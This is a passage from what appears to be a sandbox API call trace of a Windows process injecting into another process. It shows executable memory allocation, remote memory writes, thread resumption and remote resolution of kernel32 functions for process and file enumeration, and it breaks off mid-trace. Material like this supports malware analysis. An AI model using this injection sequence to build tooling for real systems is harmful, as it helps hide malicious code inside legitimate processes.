flProtect=0x40) returned 0x100000 [0189.806] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x100000, lpBuffer=0x121a90*, nSize=0x230, lpNumberOfBytesWritten=0xcdc08 | out: lpBuffer=0x121a90*, lpNumberOfBytesWritten=0xcdc08*=0x230) returned 1 [0189.807] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.807] GetProcAddress (hModule=0x7ffb26230000, lpProcName="WaitForSingleObject") returned 0x7ffb2625d840 [0189.807] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0189.807] GetProcAddress (hModule=0x7ffb26230000, lpProcName="SignalObjectAndWait") returned 0x7ffb2625d070 [0189.807] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ExitProcess") returned 0x7ffb26254d80 [0189.807] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ResetEvent") returned 0x7ffb2625d7e0 [0189.807] GetProcAddress (hModule=0x7ffb26230000, lpProcName="InitializeCriticalSection") returned 0x7ffb28b6ced0 [0189.808] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LeaveCriticalSection") returned 0x7ffb28b2eb00 [0189.808] GetProcAddress (hModule=0x7ffb26230000, lpProcName="EnterCriticalSection") returned 0x7ffb28b2e600 [0189.808] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xd8, flAllocationType=0x3000, flProtect=0x40) returned 0x110000 [0189.808] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcdc60*, nSize=0xd8, lpNumberOfBytesWritten=0xcdc08 | out: lpBuffer=0xcdc60*, lpNumberOfBytesWritten=0xcdc08*=0xd8) returned 1 [0189.808] NtQueryInformationProcess (in: ProcessHandle=0x730, ProcessInformationClass=0x0, ProcessInformation=0xcda90, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0xcda90, ReturnLength=0x0) returned 0x0 [0189.808] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x24e000, lpBuffer=0xcda70, nSize=0x20, lpNumberOfBytesRead=0xcda28 | out: lpBuffer=0xcda70*, lpNumberOfBytesRead=0xcda28*=0x20) returned 1 [0189.808] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x7ff6bac60000, lpBuffer=0xcdac0, nSize=0x40, lpNumberOfBytesRead=0xcda28 | out: lpBuffer=0xcdac0*, lpNumberOfBytesRead=0xcda28*=0x40) returned 1 [0189.809] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x7ff6bac600f0, lpBuffer=0xcdb00, nSize=0x108, lpNumberOfBytesRead=0xcda28 | out: lpBuffer=0xcdb00*, lpNumberOfBytesRead=0xcda28*=0x108) returned 1 [0189.809] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x7ff6bac63980, lpBuffer=0xcde68*, nSize=0x16, lpNumberOfBytesWritten=0xcdc08 | out: lpBuffer=0xcde68*, lpNumberOfBytesWritten=0xcdc08*=0x16) returned 1 [0189.810] ResetEvent (hEvent=0x640) returned 1 [0189.810] ResetEvent (hEvent=0x744) returned 1 [0189.810] ResumeThread (hThread=0x80c) returned 0x1 [0189.810] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.839] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x72b0) returned 0x32ad4ae0 [0189.839] VirtualAllocEx (hProcess=0x730, lpAddress=0x180000000, dwSize=0xa000, flAllocationType=0x2000, flProtect=0x40) returned 0x180000000 [0189.839] VirtualAllocEx (hProcess=0x730, lpAddress=0x180000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x180000000 [0189.839] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.839] GetProcAddress (hModule=0x7ffb26230000, lpProcName="LoadLibraryW") returned 0x7ffb262550f0 [0189.839] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adaf64, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13 [0189.840] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0189.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32adaf64, cbMultiByte=-1, lpWideCharStr=0x32acfa50, cchWideChar=13 | out: lpWideCharStr="KERNEL32.dll") returned 13 [0189.840] lstrlenW (lpString="KERNEL32.dll") returned 12 [0189.840] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.840] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32acfa50*, nSize=0x1a, lpNumberOfBytesWritten=0xcdad8 | out: lpBuffer=0x32acfa50*, lpNumberOfBytesWritten=0xcdad8*=0x1a) returned 1 [0189.840] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0189.840] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.840] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.841] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x18, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9e8*=0x18) returned 1 [0189.841] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesWritten=0xcd9e8*=0xd8) returned 1 [0189.841] ResetEvent (hEvent=0x640) returned 1 [0189.841] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.842] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda30, nSize=0xd8, lpNumberOfBytesRead=0xcd9e8 | out: lpBuffer=0xcda30*, lpNumberOfBytesRead=0xcd9e8*=0xd8) returned 1 [0189.842] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.842] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.842] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.842] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0189.842] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.843] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.843] lstrlenA (lpString="LeaveCriticalSection") returned 20 [0189.843] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.843] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adae08*, nSize=0x15, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adae08*, lpNumberOfBytesWritten=0xcdac8*=0x15) returned 1 [0189.843] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.843] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acefd0 [0189.843] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.846] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acefd0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acefd0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.846] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.847] ResetEvent (hEvent=0x640) returned 1 [0189.847] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.847] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.847] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.847] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acefd0 | out: hHeap=0x2150000) returned 1 [0189.847] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.847] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.848] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.848] lstrlenA (lpString="EnterCriticalSection") returned 20 [0189.848] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.848] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adae20*, nSize=0x15, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adae20*, lpNumberOfBytesWritten=0xcdac8*=0x15) returned 1 [0189.848] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.848] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.848] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.849] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.849] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.849] ResetEvent (hEvent=0x640) returned 1 [0189.849] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.850] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.850] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.850] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0189.850] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.850] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.850] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.850] lstrlenA (lpString="GetProcessHeap") returned 14 [0189.850] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.850] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adae38*, nSize=0xf, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adae38*, lpNumberOfBytesWritten=0xcdac8*=0xf) returned 1 [0189.851] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.851] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.851] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.851] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.852] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.852] ResetEvent (hEvent=0x640) returned 1 [0189.852] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.852] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.852] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.852] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.852] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.853] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.853] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.853] lstrlenA (lpString="lstrcmpiW") returned 9 [0189.853] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.856] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adae4a*, nSize=0xa, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adae4a*, lpNumberOfBytesWritten=0xcdac8*=0xa) returned 1 [0189.856] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.856] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.856] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.856] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.857] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.857] ResetEvent (hEvent=0x640) returned 1 [0189.857] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.857] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.857] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.858] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0189.858] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.858] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.858] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.858] lstrlenA (lpString="Process32NextW") returned 14 [0189.858] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.858] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adae56*, nSize=0xf, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adae56*, lpNumberOfBytesWritten=0xcdac8*=0xf) returned 1 [0189.859] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.859] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acfa50 [0189.859] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.859] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acfa50*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acfa50*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.859] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.860] ResetEvent (hEvent=0x640) returned 1 [0189.860] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.860] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.862] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.862] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acfa50 | out: hHeap=0x2150000) returned 1 [0189.862] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.862] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.862] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.862] lstrlenA (lpString="Process32FirstW") returned 15 [0189.862] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.863] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adae68*, nSize=0x10, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adae68*, lpNumberOfBytesWritten=0xcdac8*=0x10) returned 1 [0189.863] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.863] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.863] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.863] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.864] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.864] ResetEvent (hEvent=0x640) returned 1 [0189.864] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.864] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.864] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.864] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf3c0 | out: hHeap=0x2150000) returned 1 [0189.864] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.865] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.865] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.865] lstrlenA (lpString="CreateToolhelp32Snapshot") returned 24 [0189.865] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.865] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adae7a*, nSize=0x19, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adae7a*, lpNumberOfBytesWritten=0xcdac8*=0x19) returned 1 [0189.865] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.866] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf5d0 [0189.866] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.866] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf5d0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf5d0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.866] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.867] ResetEvent (hEvent=0x640) returned 1 [0189.867] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.867] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.867] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.867] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf5d0 | out: hHeap=0x2150000) returned 1 [0189.867] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.868] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.868] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.868] lstrlenA (lpString="FindClose") returned 9 [0189.868] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.868] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adae96*, nSize=0xa, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adae96*, lpNumberOfBytesWritten=0xcdac8*=0xa) returned 1 [0189.868] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.868] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf840 [0189.868] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.869] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf840*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf840*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.869] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.869] ResetEvent (hEvent=0x640) returned 1 [0189.869] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.870] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.870] VirtualFreeEx (hProcess=0x730, lpAddress=0x1e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.870] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32acf840 | out: hHeap=0x2150000) returned 1 [0189.870] VirtualFreeEx (hProcess=0x730, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.870] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffb26230000 [0189.870] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcAddress") returned 0x7ffb26250b80 [0189.870] lstrlenA (lpString="FindNextFileW") returned 13 [0189.870] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000 [0189.870] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x20000, lpBuffer=0x32adaea2*, nSize=0xe, lpNumberOfBytesWritten=0xcdac8 | out: lpBuffer=0x32adaea2*, lpNumberOfBytesWritten=0xcdac8*=0xe) returned 1 [0189.871] ReadProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20, nSize=0xd8, lpNumberOfBytesRead=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesRead=0xcd9d8*=0xd8) returned 1 [0189.871] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acf3c0 [0189.871] VirtualAllocEx (hProcess=0x730, lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x1e0000 [0189.871] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x1e0000, lpBuffer=0x32acf3c0*, nSize=0x20, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0x32acf3c0*, lpNumberOfBytesWritten=0xcd9d8*=0x20) returned 1 [0189.871] WriteProcessMemory (in: hProcess=0x730, lpBaseAddress=0x110000, lpBuffer=0xcda20*, nSize=0xd8, lpNumberOfBytesWritten=0xcd9d8 | out: lpBuffer=0xcda20*, lpNumberOfBytesWritten=0xcd9d8*=0xd8) returned 1 [0189.872] ResetEvent (hEvent=0x640) returned 1 [0189.872] SignalObjectAndWait (hObjectToSignal=0x744, hObjectToWaitOn=0x640, dwMilliseconds=0x7530, bAlertable=0) returned 0x0 [0189.872] 